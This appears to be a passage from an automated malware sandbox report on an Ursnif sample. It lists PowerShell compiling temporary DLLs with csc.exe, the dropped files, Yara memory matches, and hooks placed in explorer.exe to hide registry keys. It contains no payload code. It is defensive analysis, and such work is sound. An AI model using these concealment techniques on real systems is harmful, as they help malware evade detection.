                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093B1B5 push 3B000001h; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DB1B5 push 3B000001h; retf
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_009679B6 push ss; ret
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0098528F push ecx; ret
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00984EE0 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B1552 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: aixojixg.dll.20.drStatic PE information: real checksum: 0x0 should be: 0xee27
                      Source: keehvxm3.dll.24.drStatic PE information: real checksum: 0x0 should be: 0xeb64
                      Source: data.dllStatic PE information: real checksum: 0x75958 should be: 0x7619a
                      Source: a52acufz.dll.19.drStatic PE information: real checksum: 0x0 should be: 0x2fa8
                      Source: ddwuzigh.dll.23.drStatic PE information: real checksum: 0x0 should be: 0x5f5e
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
                      Hooks registry keys query functions (used to hide registry keys)Show sources
                      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
                      Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
                      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
                      Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
                      Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
                      Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
